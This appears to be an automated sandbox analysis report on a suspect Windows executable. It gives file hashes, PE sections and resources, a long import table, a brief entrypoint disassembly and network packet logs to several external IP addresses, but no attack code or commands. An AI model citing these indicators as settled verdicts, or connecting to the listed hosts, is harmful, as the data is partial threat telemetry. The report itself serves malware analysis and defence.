                                                                                                                Preview:|....6A3A...1...f.6B..o:0...VZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ.6A3OQ.78.8.w.2z...&.J.=C51(R[aP )VLmS?v(FXaZ/n.vkm\52?.;L9eNG98M1Z/[:.|S&.zY_..:1.)...{. .".j:T.[..{Y_.c352.V&.ANG98M1Z..36.2@N.I..1ZVZ36A3.NE83L:ZV.76A3ANG98MqOVZ3&A3A>C98MqZVJ36A1ANA98M1ZVZ56A3ANG98=5ZVX36A3ANE9x.1ZFZ3&A3ANW98]1ZVZ36Q3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG9.9T""Z36.aENG)8M1.RZ3&A3ANG98M1ZVZ36a3A.G98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36A3ANG98M1ZVZ36

                                                                                                                C:\Users\user\AppData\Local\Temp\f3663-3k

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                Category:modified
                                                                                                                Size (bytes):196608
                                                                                                                Entropy (8bit):1.1215420383712111
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                                Malicious:false
                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.54270969125083
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:sa7Bw41TUq.exe
                                                                                                                File size:1'364'575 bytes
                                                                                                                MD5:6cd77b30f320ed9e0e515073e1175898
                                                                                                                SHA1:c60f550fefe35a235e0ddddf876626cf0bdd77eb
                                                                                                                SHA256:207680e811fa11e2aceed223a1ac803751e70ef42f951fad9a068530b0044727
                                                                                                                SHA512:9e7a73af7f2e0585b10f8caec50e037f312291e0bbcd52d191acceb56b28df993672b5787396428a63f60ccc592ca605b22150f8bb91864dde6e3be4f70f322c
                                                                                                                SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCDon9ioPvWGE590RWtG6inoJ6xF5:7JZoQrbTFZY1iaCDo9ioPvWTE8o60oAl
                                                                                                                TLSH:C755F121B9D68076C2B323B19E7FF76A9A3D79360327D19727C42D324EA05416B29733
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                                                                File Icon

                                                                                                                Icon Hash:1733312925935517

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x4165c1
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:5
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:5
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:5
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                call 00007F654D1AA0BBh
                                                                                                                jmp 00007F654D1A0F2Eh
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                push edi
                                                                                                                push esi
                                                                                                                mov esi, dword ptr [ebp+0Ch]
                                                                                                                mov ecx, dword ptr [ebp+10h]
                                                                                                                mov edi, dword ptr [ebp+08h]
                                                                                                                mov eax, ecx
                                                                                                                mov edx, ecx
                                                                                                                add eax, esi
                                                                                                                cmp edi, esi
                                                                                                                jbe 00007F654D1A10AAh
                                                                                                                cmp edi, eax
                                                                                                                jc 00007F654D1A1246h
                                                                                                                cmp ecx, 00000080h
                                                                                                                jc 00007F654D1A10BEh
                                                                                                                cmp dword ptr [004A9724h], 00000000h
                                                                                                                je 00007F654D1A10B5h
                                                                                                                push edi
                                                                                                                push esi
                                                                                                                and edi, 0Fh
                                                                                                                and esi, 0Fh
                                                                                                                cmp edi, esi
                                                                                                                pop esi
                                                                                                                pop edi
                                                                                                                jne 00007F654D1A10A7h
                                                                                                                jmp 00007F654D1A1482h
                                                                                                                test edi, 00000003h
                                                                                                                jne 00007F654D1A10B6h
                                                                                                                shr ecx, 02h
                                                                                                                and edx, 03h
                                                                                                                cmp ecx, 08h
                                                                                                                jc 00007F654D1A10CBh
                                                                                                                rep movsd
                                                                                                                jmp dword ptr [00416740h+edx*4]
                                                                                                                mov eax, edi
                                                                                                                mov edx, 00000003h
                                                                                                                sub ecx, 04h
                                                                                                                jc 00007F654D1A10AEh
                                                                                                                and eax, 03h
                                                                                                                add ecx, eax
                                                                                                                jmp dword ptr [00416654h+eax*4]
                                                                                                                jmp dword ptr [00416750h+ecx*4]
                                                                                                                nop
                                                                                                                jmp dword ptr [004166D4h+ecx*4]
                                                                                                                nop
                                                                                                                inc cx
                                                                                                                add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                inc cx
                                                                                                                add byte ptr [ebx], ah
                                                                                                                ror dword ptr [edx-75F877FAh], 1
                                                                                                                inc esi
                                                                                                                add dword ptr [eax+468A0147h], ecx
                                                                                                                add al, cl
                                                                                                                jmp 00007F654F6198A7h
                                                                                                                add esi, 03h
                                                                                                                add edi, 03h
                                                                                                                cmp ecx, 08h
                                                                                                                jc 00007F654D1A106Eh
                                                                                                                rep movsd
                                                                                                                jmp dword ptr [00000000h+edx*4]

                                                                                                                Rich Headers

                                                                                                                Programming Language:
                                                                                                                • [ C ] VS2010 SP1 build 40219
                                                                                                                • [C++] VS2010 SP1 build 40219
                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                • [ASM] VS2010 SP1 build 40219
                                                                                                                • [RES] VS2010 SP1 build 40219
                                                                                                                • [LNK] VS2010 SP1 build 40219

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                                RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                                RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                                RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                                RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                                                Possible Origin

                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishGreat Britain
                                                                                                                EnglishUnited States

                                                                                                                Network Behavior

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Oct 9, 2024 14:05:50.561923981 CEST4986980192.168.2.7195.110.124.133
                                                                                                                Oct 9, 2024 14:05:50.566952944 CEST8049869195.110.124.133192.168.2.7
                                                                                                                Oct 9, 2024 14:05:50.567045927 CEST4986980192.168.2.7195.110.124.133
                                                                                                                Oct 9, 2024 14:05:50.575087070 CEST4986980192.168.2.7195.110.124.133
                                                                                                                Oct 9, 2024 14:05:50.580287933 CEST8049869195.110.124.133192.168.2.7
                                                                                                                Oct 9, 2024 14:05:51.247927904 CEST8049869195.110.124.133192.168.2.7
                                                                                                                Oct 9, 2024 14:05:51.248318911 CEST8049869195.110.124.133192.168.2.7
                                                                                                                Oct 9, 2024 14:05:51.248502016 CEST4986980192.168.2.7195.110.124.133
                                                                                                                Oct 9, 2024 14:05:51.252199888 CEST4986980192.168.2.7195.110.124.133
                                                                                                                Oct 9, 2024 14:05:51.257085085 CEST8049869195.110.124.133192.168.2.7
                                                                                                                Oct 9, 2024 14:06:06.308926105 CEST4994680192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:06.314666986 CEST804994613.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:06.314760923 CEST4994680192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:06.326176882 CEST4994680192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:06.331114054 CEST804994613.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:06.777877092 CEST804994613.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:06.777993917 CEST4994680192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:07.835464001 CEST4994680192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:07.840393066 CEST804994613.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:08.853997946 CEST4996180192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:08.859430075 CEST804996113.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:08.859574080 CEST4996180192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:08.870631933 CEST4996180192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:08.875720024 CEST804996113.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:09.322642088 CEST804996113.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:09.322740078 CEST4996180192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:10.382026911 CEST4996180192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:10.387032032 CEST804996113.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:11.596483946 CEST4997180192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:11.601397991 CEST804997113.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:11.601475954 CEST4997180192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:11.670664072 CEST4997180192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:11.675580978 CEST804997113.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:11.675808907 CEST804997113.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:12.091451883 CEST804997113.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:12.091537952 CEST4997180192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:13.179481030 CEST4997180192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:13.184566021 CEST804997113.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:14.222141981 CEST4997680192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:14.227432966 CEST804997613.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:14.227515936 CEST4997680192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:14.321759939 CEST4997680192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:14.326760054 CEST804997613.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:14.708092928 CEST804997613.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:14.711096048 CEST804997613.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:14.711169004 CEST4997680192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:14.751202106 CEST4997680192.168.2.713.248.169.48
                                                                                                                Oct 9, 2024 14:06:14.756356001 CEST804997613.248.169.48192.168.2.7
                                                                                                                Oct 9, 2024 14:06:19.798113108 CEST4997780192.168.2.7188.114.96.3
                                                                                                                Oct 9, 2024 14:06:19.803066969 CEST8049977188.114.96.3192.168.2.7
                                                                                                                Oct 9, 2024 14:06:19.803334951 CEST4997780192.168.2.7188.114.96.3
                                                                                                                Oct 9, 2024 14:06:19.814477921 CEST4997780192.168.2.7188.114.96.3
                                                                                                                Oct 9, 2024 14:06:19.819432020 CEST8049977188.114.96.3192.168.2.7
                                                                                                                Oct 9, 2024 14:06:20.954010963 CEST8049977188.114.96.3192.168.2.7
                                                                                                                Oct 9, 2024 14:06:20.954061031 CEST8049977188.114.96.3192.168.2.7
                                                                                                                Oct 9, 2024 14:06:20.954094887 CEST8049977188.114.96.3192.168.2.7
                                                                                                                Oct 9, 2024 14:06:20.954166889 CEST4997780192.168.2.7188.114.96.3
                                                                                                                Oct 9, 2024 14:06:21.319575071 CEST4997780192.168.2.7188.114.96.3
                                                                                                                Oct 9, 2024 14:06:22.342711926 CEST4997880192.168.2.7188.114.96.3
